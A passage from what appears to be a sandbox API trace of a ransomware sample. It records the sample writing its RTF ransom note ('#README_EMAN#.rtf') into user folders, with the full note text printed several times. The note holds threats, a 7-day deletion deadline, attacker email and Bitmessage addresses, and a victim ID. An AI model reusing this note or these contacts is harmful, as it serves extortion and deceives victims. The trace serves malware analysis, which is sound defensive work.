}}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.223] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.223] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1f495e8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nu y5\x97>\x13¹\x0cgR6÷Æ\x1dáh\x8f\"ûT¹\x9fcN", lpUsedDefaultChar=0x0) returned 8717 [0278.223] WriteFile (in: hFile=0x294, lpBuffer=0x1f495e8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1f495e8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0278.224] CloseHandle (hObject=0x294) returned 1 [0278.224] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\th\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user 